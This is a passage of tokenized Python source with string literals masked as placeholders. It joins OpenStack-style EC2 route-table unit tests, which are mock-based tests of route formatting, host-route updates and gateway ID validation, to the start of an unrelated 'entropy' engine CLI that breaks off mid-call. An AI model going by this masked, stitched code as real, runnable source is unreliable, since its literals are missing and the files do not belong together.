ListMatches ( [ fakes . EC2_ROUTE_TABLE_1 , <EOL> fakes . EC2_ROUTE_TABLE_2 , <EOL> fakes . EC2_ROUTE_TABLE_3 ] , <EOL> orderless_lists = True ) ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 } ) <EOL> self . assertThat ( resp [ '<STR_LIT>' ] , <EOL> matchers . ListMatches ( [ fakes . EC2_ROUTE_TABLE_1 ] ) ) <EOL> self . db_api . get_items_by_ids . assert_called_once_with ( <EOL> mock . ANY , set ( [ fakes . ID_EC2_ROUTE_TABLE_1 ] ) ) <EOL> self . check_filtering ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> [ ( '<STR_LIT>' , <EOL> fakes . ID_EC2_ROUTE_TABLE_ASSOCIATION_1 ) , <EOL> ( '<STR_LIT>' , fakes . ID_EC2_ROUTE_TABLE_1 ) , <EOL> ( '<STR_LIT>' , fakes . ID_EC2_SUBNET_2 ) , <EOL> ( '<STR_LIT>' , True ) , <EOL> ( '<STR_LIT>' , fakes . ID_EC2_ROUTE_TABLE_1 ) , <EOL> ( '<STR_LIT>' , fakes . CIDR_EXTERNAL_NETWORK ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , fakes . ID_EC2_INSTANCE_1 ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , fakes . ID_EC2_VPC_1 ) ] ) <EOL> self . check_tag_support ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> fakes . ID_EC2_ROUTE_TABLE_1 , '<STR_LIT>' ) <EOL> def test_describe_route_tables_variations ( self ) : <EOL> igw_1 = tools . purge_dict ( fakes . DB_IGW_1 , ( '<STR_LIT>' , ) ) <EOL> igw_2 = tools . update_dict ( fakes . DB_IGW_2 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPC_2 } ) <EOL> subnet_1 = tools . update_dict ( <EOL> fakes . DB_SUBNET_1 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 } ) <EOL> subnet_2 = tools . update_dict ( <EOL> fakes . DB_SUBNET_2 , <EOL> { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } ) <EOL> route_table_1 = copy . deepcopy ( fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table_1 [ '<STR_LIT>' ] . append ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_2 } ) <EOL> route_table_1 [ '<STR_LIT>' ] . append ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_1 } ) <EOL> deleted_eni_id = fakes . random_ec2_id ( '<STR_LIT>' ) <EOL> route_table_1 [ '<STR_LIT>' ] . append ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : deleted_eni_id } ) <EOL> route_table_2 = copy . deepcopy ( fakes . DB_ROUTE_TABLE_2 ) <EOL> route_table_2 [ '<STR_LIT>' ] . append ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_2 } ) <EOL> route_table_2 [ '<STR_LIT>' ] . append ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } ) <EOL> route_table_2 [ '<STR_LIT>' ] . append ( <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } ) <EOL> self . set_mock_db_items ( <EOL> route_table_1 , route_table_2 , fakes . DB_VPC_1 , fakes . DB_VPC_2 , <EOL> igw_1 , igw_2 , subnet_1 , subnet_2 , <EOL> fakes . DB_NETWORK_INTERFACE_1 , fakes . DB_NETWORK_INTERFACE_2 , <EOL> fakes . DB_VPN_GATEWAY_2 ) <EOL> self . nova . servers . get . return_value = ( <EOL> mock . NonCallableMock ( status = '<STR_LIT>' ) ) <EOL> resp = self . execute ( '<STR_LIT>' , { } ) <EOL> ec2_route_table_1 = copy . deepcopy ( fakes . EC2_ROUTE_TABLE_1 ) <EOL> ec2_route_table_1 [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_2 , <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ec2_route_table_1 [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_1 , <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ec2_route_table_1 [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : deleted_eni_id , <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ec2_route_table_1 [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : <EOL> fakes . ID_EC2_SUBNET_1 . replace ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_SUBNET_1 , <EOL> '<STR_LIT>' : False } ) <EOL> ec2_route_table_2 = copy . deepcopy ( fakes . EC2_ROUTE_TABLE_2 ) <EOL> ec2_route_table_2 [ '<STR_LIT>' ] [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] = '<STR_LIT>' <EOL> del ec2_route_table_2 [ '<STR_LIT>' ] [ <NUM_LIT:2> ] <EOL> ec2_route_table_2 [ '<STR_LIT>' ] [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] = '<STR_LIT>' <EOL> ec2_route_table_2 [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_2 , <EOL> '<STR_LIT>' : fakes . ID_EC2_INSTANCE_1 , <EOL> '<STR_LIT>' : fakes . ID_OS_PROJECT , <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ec2_route_table_2 [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 , <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ec2_route_table_2 [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 , <EOL> '<STR_LIT:state>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> ec2_route_table_2 [ '<STR_LIT>' ] = [ { <EOL> '<STR_LIT>' : <EOL> fakes . ID_EC2_SUBNET_2 . replace ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . ID_EC2_SUBNET_2 , <EOL> '<STR_LIT>' : False } ] <EOL> self . assertThat ( resp [ '<STR_LIT>' ] , <EOL> matchers . ListMatches ( [ ec2_route_table_1 , <EOL> ec2_route_table_2 ] ) ) <EOL> def test_format_route_table ( self ) : <EOL> id_db_ec2_vpn_gateway_3 = fakes . random_ec2_id ( '<STR_LIT>' ) <EOL> db_route_table_1 = tools . update_dict ( <EOL> fakes . DB_ROUTE_TABLE_1 , <EOL> { '<STR_LIT>' : [ fakes . ID_EC2_VPN_GATEWAY_1 , <EOL> fakes . ID_EC2_VPN_GATEWAY_2 , <EOL> id_db_ec2_vpn_gateway_3 ] } ) <EOL> db_route_table_1 [ '<STR_LIT>' ] . extend ( <EOL> [ { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 , <EOL> '<STR_LIT>' : fakes . CIDR_VPN_1_STATIC } , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' } ] ) <EOL> vpn_connection_3 = tools . update_dict ( <EOL> fakes . DB_VPN_CONNECTION_1 , <EOL> { '<STR_LIT>' : fakes . random_ec2_id ( '<STR_LIT>' ) } ) <EOL> vpn_connection_3 [ '<STR_LIT>' ] . append ( '<STR_LIT>' ) <EOL> ec2_route_table_1 = tools . patch_dict ( <EOL> fakes . EC2_ROUTE_TABLE_1 , <EOL> { '<STR_LIT>' : [ { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } , <EOL> { '<STR_LIT>' : id_db_ec2_vpn_gateway_3 } ] } , <EOL> ( '<STR_LIT>' , ) ) <EOL> ec2_route_table_1 [ '<STR_LIT>' ] . extend ( <EOL> [ { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 , <EOL> '<STR_LIT>' : fakes . CIDR_VPN_1_STATIC , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:state>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:state>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 , <EOL> '<STR_LIT>' : fakes . CIDR_VPN_1_PROPAGATED_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:state>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:state>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 , <EOL> '<STR_LIT>' : fakes . CIDR_VPN_2_PROPAGATED_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:state>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 , <EOL> '<STR_LIT>' : fakes . CIDR_VPN_2_PROPAGATED_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:state>' : '<STR_LIT>' } ] ) <EOL> self . assertThat ( <EOL> route_table_api . _format_route_table ( <EOL> base . create_context ( ) , db_route_table_1 , <EOL> gateways = { gw [ '<STR_LIT:id>' ] : gw <EOL> for gw in ( fakes . DB_VPN_GATEWAY_1 , <EOL> fakes . DB_VPN_GATEWAY_2 , <EOL> fakes . DB_IGW_1 ) } , <EOL> vpn_connections_by_gateway_id = { <EOL> fakes . ID_EC2_VPN_GATEWAY_1 : [ fakes . DB_VPN_CONNECTION_1 , <EOL> vpn_connection_3 ] , <EOL> fakes . ID_EC2_VPN_GATEWAY_2 : [ fakes . DB_VPN_CONNECTION_2 ] } ) , <EOL> matchers . DictMatches ( ec2_route_table_1 , orderless_lists = True ) , <EOL> verbose = True ) <EOL> def test_get_subnet_host_routes_and_gateway_ip ( self ) : <EOL> self . set_mock_db_items ( <EOL> fakes . DB_NETWORK_INTERFACE_1 , fakes . DB_NETWORK_INTERFACE_2 , <EOL> fakes . DB_IGW_1 , fakes . DB_VPN_GATEWAY_1 , fakes . DB_VPN_GATEWAY_2 , <EOL> fakes . DB_VPN_CONNECTION_1 ) <EOL> route_table_1 = copy . deepcopy ( fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table_1 [ '<STR_LIT>' ] . extend ( [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_2 } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . random_ec2_id ( '<STR_LIT>' ) } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . random_ec2_id ( '<STR_LIT>' ) } ] ) <EOL> host_routes , gateway_ip = ( <EOL> route_table_api . _get_subnet_host_routes_and_gateway_ip ( <EOL> mock . ANY , route_table_1 , fakes . CIDR_SUBNET_1 ) ) <EOL> self . assertThat ( host_routes , <EOL> matchers . ListMatches ( [ <EOL> { '<STR_LIT>' : fakes . CIDR_VPC_1 , <EOL> '<STR_LIT>' : fakes . IP_GATEWAY_SUBNET_1 } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . IP_GATEWAY_SUBNET_1 } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:127.0.0.1>' } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:127.0.0.1>' } ] ) ) <EOL> self . assertEqual ( None , gateway_ip ) <EOL> host_routes , gateway_ip = ( <EOL> route_table_api . _get_subnet_host_routes_and_gateway_ip ( <EOL> mock . ANY , fakes . DB_ROUTE_TABLE_2 , fakes . CIDR_SUBNET_1 ) ) <EOL> self . assertEqual ( fakes . IP_GATEWAY_SUBNET_1 , gateway_ip ) <EOL> self . assertThat ( host_routes , <EOL> matchers . ListMatches ( [ <EOL> { '<STR_LIT>' : fakes . CIDR_VPC_1 , <EOL> '<STR_LIT>' : fakes . IP_GATEWAY_SUBNET_1 } , <EOL> { '<STR_LIT>' : fakes . CIDR_EXTERNAL_NETWORK , <EOL> '<STR_LIT>' : fakes . IP_NETWORK_INTERFACE_2 } , <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . IP_GATEWAY_SUBNET_1 } , <EOL> { '<STR_LIT>' : fakes . CIDR_VPN_1_PROPAGATED_1 , <EOL> '<STR_LIT>' : fakes . IP_GATEWAY_SUBNET_1 } ] ) ) <EOL> self . assertEqual ( fakes . IP_GATEWAY_SUBNET_1 , gateway_ip ) <EOL> @ mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_host_routes ( self , destinations_getter , routes_getter ) : <EOL> self . neutron . show_subnet . side_effect = tools . get_by_1st_arg_getter ( <EOL> { fakes . ID_OS_SUBNET_1 : { '<STR_LIT>' : fakes . OS_SUBNET_1 } , <EOL> fakes . ID_OS_SUBNET_2 : { '<STR_LIT>' : fakes . OS_SUBNET_2 } } ) <EOL> routes_getter . side_effect = [ <EOL> ( '<STR_LIT>' , fakes . IP_GATEWAY_SUBNET_1 ) , <EOL> ( '<STR_LIT>' , None ) ] <EOL> destinations_getter . return_value = { '<STR_LIT>' : '<STR_LIT>' } <EOL> route_table_api . _update_host_routes ( <EOL> base . create_context ( ) , self . neutron , common . OnCrashCleaner ( ) , <EOL> fakes . DB_ROUTE_TABLE_1 , [ fakes . DB_SUBNET_1 , fakes . DB_SUBNET_2 ] ) <EOL> destinations_getter . assert_called_once_with ( <EOL> mock . ANY , fakes . DB_ROUTE_TABLE_1 ) <EOL> self . assertEqual ( <NUM_LIT:2> , routes_getter . call_count ) <EOL> routes_getter . assert_any_call ( <EOL> mock . ANY , fakes . DB_ROUTE_TABLE_1 , fakes . CIDR_SUBNET_1 , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> routes_getter . assert_any_call ( <EOL> mock . ANY , fakes . DB_ROUTE_TABLE_1 , fakes . CIDR_SUBNET_2 , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . assertEqual ( <NUM_LIT:2> , self . neutron . update_subnet . call_count ) <EOL> self . neutron . update_subnet . assert_any_call ( <EOL> fakes . ID_OS_SUBNET_1 , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . IP_GATEWAY_SUBNET_1 } } ) <EOL> self . neutron . update_subnet . assert_any_call ( <EOL> fakes . ID_OS_SUBNET_2 , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : None } } ) <EOL> self . neutron . reset_mock ( ) <EOL> routes_getter . side_effect = None <EOL> routes_getter . return_value = ( '<STR_LIT>' , fakes . IP_GATEWAY_SUBNET_2 ) <EOL> try : <EOL> with common . OnCrashCleaner ( ) as cleaner : <EOL> route_table_api . _update_host_routes ( <EOL> base . create_context ( ) , self . neutron , cleaner , <EOL> fakes . DB_ROUTE_TABLE_1 , [ fakes . DB_SUBNET_1 ] ) <EOL> raise Exception ( '<STR_LIT>' ) <EOL> except Exception as ex : <EOL> if str ( ex ) != '<STR_LIT>' : <EOL> raise <EOL> self . neutron . update_subnet . assert_any_call ( <EOL> fakes . ID_OS_SUBNET_1 , <EOL> { '<STR_LIT>' : { '<STR_LIT>' : fakes . OS_SUBNET_1 [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : fakes . IP_GATEWAY_SUBNET_1 } } ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_routes_in_associated_subnets ( self , routes_updater , <EOL> update_vpn_routes ) : <EOL> subnet_default_rtb = { '<STR_LIT:id>' : fakes . random_ec2_id ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPC_1 } <EOL> subnet_rtb_1 = { '<STR_LIT:id>' : fakes . random_ec2_id ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPC_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 } <EOL> subnet_rtb_2 = { '<STR_LIT:id>' : fakes . random_ec2_id ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPC_1 , <EOL> '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 } <EOL> subnet_vpc_2 = { '<STR_LIT:id>' : fakes . random_ec2_id ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPC_2 } <EOL> self . set_mock_db_items ( subnet_default_rtb , subnet_rtb_1 , subnet_rtb_2 , <EOL> subnet_vpc_2 , fakes . DB_VPC_1 ) <EOL> def do_check ( rtb , subnets , default_associations_only = None , <EOL> host_only = None ) : <EOL> self . db_api . reset_mock ( ) <EOL> routes_updater . reset_mock ( ) <EOL> update_vpn_routes . reset_mock ( ) <EOL> route_table_api . _update_routes_in_associated_subnets ( <EOL> base . create_context ( ) , '<STR_LIT>' , rtb , <EOL> default_associations_only = default_associations_only , <EOL> update_target = ( route_table_api . HOST_TARGET <EOL> if host_only else <EOL> None ) ) <EOL> self . db_api . get_items . assert_any_call ( <EOL> mock . ANY , '<STR_LIT>' ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , self . neutron , '<STR_LIT>' , rtb , subnets ) <EOL> if host_only : <EOL> self . assertFalse ( update_vpn_routes . called ) <EOL> else : <EOL> update_vpn_routes . assert_called_once_with ( <EOL> mock . ANY , self . neutron , '<STR_LIT>' , rtb , subnets ) <EOL> do_check ( fakes . DB_ROUTE_TABLE_2 , [ subnet_rtb_2 ] , host_only = True ) <EOL> self . db_api . get_item_by_id . assert_called_once_with ( <EOL> mock . ANY , fakes . ID_EC2_VPC_1 ) <EOL> do_check ( fakes . DB_ROUTE_TABLE_1 , [ subnet_default_rtb , subnet_rtb_1 ] ) <EOL> self . db_api . get_item_by_id . assert_called_once_with ( <EOL> mock . ANY , fakes . ID_EC2_VPC_1 ) <EOL> do_check ( fakes . DB_ROUTE_TABLE_1 , [ subnet_default_rtb ] , <EOL> default_associations_only = True ) <EOL> self . assertFalse ( self . db_api . get_item_by_id . called ) <EOL> routes_updater . reset_mock ( ) <EOL> update_vpn_routes . reset_mock ( ) <EOL> route_table_api . _update_routes_in_associated_subnets ( <EOL> mock . MagicMock ( ) , '<STR_LIT>' , fakes . DB_ROUTE_TABLE_1 , <EOL> update_target = route_table_api . VPN_TARGET ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , self . neutron , '<STR_LIT>' , <EOL> fakes . DB_ROUTE_TABLE_1 , [ subnet_default_rtb , subnet_rtb_1 ] ) <EOL> update_vpn_routes . assert_called_once_with ( <EOL> mock . ANY , self . neutron , '<STR_LIT>' , <EOL> fakes . DB_ROUTE_TABLE_1 , [ subnet_default_rtb , subnet_rtb_1 ] ) <EOL> def test_get_router_destinations ( self ) : <EOL> self . set_mock_db_items ( fakes . DB_IGW_1 , fakes . DB_NETWORK_INTERFACE_2 ) <EOL> route_table_2 = copy . deepcopy ( fakes . DB_ROUTE_TABLE_2 ) <EOL> fake_igw_id = fakes . random_ec2_id ( '<STR_LIT>' ) <EOL> fake_vgw_id = fakes . random_ec2_id ( '<STR_LIT>' ) <EOL> fake_eni_id = fakes . random_ec2_id ( '<STR_LIT>' ) <EOL> route_table_2 [ '<STR_LIT>' ] . extend ( [ <EOL> { '<STR_LIT>' : fake_igw_id , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : fake_vgw_id , <EOL> '<STR_LIT>' : '<STR_LIT>' } , <EOL> { '<STR_LIT>' : fake_eni_id , <EOL> '<STR_LIT>' : '<STR_LIT>' } ] ) <EOL> host_routes = route_table_api . _get_active_route_destinations ( <EOL> '<STR_LIT>' , route_table_2 ) <EOL> self . assertThat ( host_routes , matchers . DictMatches ( { <EOL> fakes . ID_EC2_IGW_1 : fakes . DB_IGW_1 , <EOL> fakes . ID_EC2_NETWORK_INTERFACE_2 : <EOL> fakes . DB_NETWORK_INTERFACE_2 } ) ) <EOL> self . db_api . get_items_by_ids . assert_called_once_with ( <EOL> mock . ANY , [ fakes . ID_EC2_NETWORK_INTERFACE_2 , fakes . ID_EC2_IGW_1 , <EOL> fake_igw_id , fake_vgw_id , fake_eni_id , <EOL> fakes . ID_EC2_VPN_GATEWAY_1 ] ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_update_subnet_routes ( self , host_routes_updater , <EOL> update_vpn_routes ) : <EOL> route_table_api . _update_subnet_routes ( <EOL> base . create_context ( ) , '<STR_LIT>' , fakes . DB_SUBNET_1 , <EOL> fakes . DB_ROUTE_TABLE_1 ) <EOL> host_routes_updater . assert_called_once_with ( <EOL> mock . ANY , self . neutron , '<STR_LIT>' , fakes . DB_ROUTE_TABLE_1 , <EOL> [ fakes . DB_SUBNET_1 ] ) <EOL> update_vpn_routes . assert_called_once_with ( <EOL> mock . ANY , self . neutron , '<STR_LIT>' , fakes . DB_ROUTE_TABLE_1 , <EOL> [ fakes . DB_SUBNET_1 ] ) <EOL> class RouteTableValidatorTestCase ( test_base . BaseTestCase ) : <EOL> def test_validate_igw_or_vgw_id ( self ) : <EOL> validator = route_table_api . Validator ( ) <EOL> validator . igw_or_vgw_id ( fakes . random_ec2_id ( '<STR_LIT>' ) ) <EOL> validator . igw_or_vgw_id ( fakes . random_ec2_id ( '<STR_LIT>' ) ) <EOL> invalid_ids = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> fakes . random_ec2_id ( '<STR_LIT>' ) , fakes . random_ec2_id ( '<STR_LIT:i>' ) , <EOL> fakes . random_ec2_id ( '<STR_LIT>' ) , fakes . random_ec2_id ( '<STR_LIT>' ) ] <EOL> for id in invalid_ids : <EOL> self . assertRaises ( exception . InvalidParameterValue , <EOL> validator . igw_or_vgw_id , id ) </s>
<s> import argparse <EOL> import logging <EOL> import os <EOL> import tempfile <EOL> from engine import Engine <EOL> from entropy import utils <EOL> LOG = logging . getLogger ( __name__ ) <EOL> engine_cfg = os . path . join ( tempfile . gettempdir ( ) , '<STR_LIT>' ) <EOL> def _get_backend_from_engine ( engine ) : <EOL> try : <EOL> engine_config = dict ( utils . load_yaml ( engine_cfg ) ) [ engine ] <EOL> this_engine_cfg_file = engine_config [ '<STR_LIT>' ] <EOL> this_engine_cfg = dict ( utils . load_yaml ( this_engine_cfg_file ) ) <EOL> return Engine . get_backend ( this_engine_cfg [ engine ] [ '<STR_LIT>' ] , <EOL> this_engine_cfg [ engine ] ) <EOL> except KeyError : <EOL> LOG . exception ( "<STR_LIT>" ) <EOL> def _add_to_list ( engine , script_type , script_name , ** script_args ) : <EOL> backend = _get_backend_from_engine ( engine ) <EOL> if backend . check_script_exists ( script_type , script_name ) : <EOL> LOG . error ( '<STR_LIT>' , script_type ) <EOL> return False <EOL> try : <EOL> data = { <EOL> script_name : script_args <EOL> } <EOL> backend . add_script ( script_type , data ) <EOL> return True <EOL> except KeyError : <EOL> LOG . exception ( "<STR_LIT>" , script_type , script_name ) <EOL> except Exception : <EOL> LOG . exception ( "<STR_LIT>" , script_type , <EOL> script_name ) <EOL> return False <EOL> def _remove_from_list ( engine , script_type , script_name ) : <EOL> backend = _get_backend_from_engine ( engine ) <EOL> try : <EOL> backend . remove_script ( script_type , script_name ) <EOL> except Exception : <EOL> LOG . exception ( "<STR_LIT>" , <EOL> script_type , script_name ) <EOL> def register_audit ( args ) : <EOL> LOG . info ( '<STR_LIT>' , args . name ) <EOL> if not ( args . conf and args . name and args . engine ) : <EOL> LOG . error ( '<STR_LIT>' ) <EOL> return <EOL> audit_cfg_args = { '<STR_LIT>' : os . path . join ( os . getcwd ( ) , args . conf ) } <EOL> if _add_to_list ( args . engine , '<STR_LIT>' , args . name , ** audit_cfg_args ) : <EOL> LOG . info ( '<STR_LIT>' , args . name ) <EOL> def unregister_audit ( args ) : <EOL> LOG . info ( '<STR_LIT>' , args . name ) <EOL> if not args . name and args . engine : <EOL> LOG . error ( '<STR_LIT>' ) <EOL> return <EOL> _remove_from_list ( args . engine , '<STR_LIT>' , args . name ) <EOL> def register_repair ( args ) : <EOL> LOG . info ( '<STR_LIT>' , args . name ) <EOL> if not ( args . conf and args . name and args . engine ) : <EOL> LOG . error ( '<STR_LIT>' ) <EOL> return <EOL> repair_cfg_args = { '<STR_LIT>' : os . path . join ( os . getcwd ( ) , args . conf ) } <EOL> if _add_to_list ( args . engine , '<STR_LIT>' , args . name , ** repair_cfg_args ) : <EOL> LOG . info ( '<STR_LIT>' , args . name ) <EOL> def unregister_repair ( args ) : <EOL> LOG . info ( '<STR_LIT>' , args . name ) <EOL> if not args . name and args . engine : <EOL> LOG . error ( '<STR_LIT>' ) <EOL> return <EOL> _remove_from_list ( args . engine , '<STR_LIT>' , args . name ) <EOL> def start_engine ( args ) : <EOL> if not ( args . name and args . engine_cfg ) : <EOL> LOG . error ( '<STR_LIT>' ) <EOL> return <EOL> utils . create_files ( [ engine_cfg ] ) <EOL> if args . purge : <EOL> utils . purge_disabled ( engine_cfg ) <EOL> if utils . check_exists_and_enabled ( args . name , engine_cfg ) : <EOL> LOG . error ( "<STR_LIT>" <EOL> "<STR_LIT>" , args . name ) <EOL> return <EOL> if utils . check_exists_and_disabled ( args . name , engine_cfg ) : <EOL> LOG . error ( "<STR_LIT>" <EOL> "<STR_LIT>" , args . name ) <EOL> return <EOL> try : <EOL> cfg_data = dict ( utils . load_yaml ( args . engine_cfg ) ) [ args . name ] <EOL> cfg = { <EOL> args . name : { <EOL> '<STR_LIT>' : os . path . join ( os . getcwd ( ) , args . engine_cfg ) , <EOL> '<STR_LIT>' : os . getpid ( ) , <EOL> '<STR_LIT>' : cfg_data [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : True <EOL> } <EOL> } <EOL> utils . write_yaml ( cfg , engine_cfg ) <EOL> LOG . info ( '<STR_LIT>' , args . name ) <EOL> entropy_engine = Engine ( args . name , ** cfg_data ) <EOL> entropy_engine . run ( ) <EOL> except Exception : <EOL> LOG . exception ( "<STR_LIT>" , args . name ) <EOL> return <EOL> def stop_engine ( args ) : <EOL> LOG . info ( "<STR_LIT>" , args . name ) <EOL> utils . disable_engine ( args . name , engine_cfg ) <EOL> def parse ( ) : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> subparsers = parser . add_subparsers ( dest = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> register_audit_parser = subparsers . add_parser ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> register_audit_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT:name>' , <EOL> action = '<STR_LIT:store>' , help = '<STR_LIT>' ) <EOL> register_audit_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , <EOL> action = '<STR_LIT:store>' , help = '<STR_LIT>' ) <EOL> register_audit_parser . add_argument ( '<STR_LIT:-c>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> register_audit_parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , action = '<STR_LIT:store>' , <EOL> help = '<STR_LIT>' ) <EOL> register_audit_parser . set_defaults ( func = register_audit ) <EOL> unregister_audit_parser = subparsers . add_parser ( '<STR_LIT>' 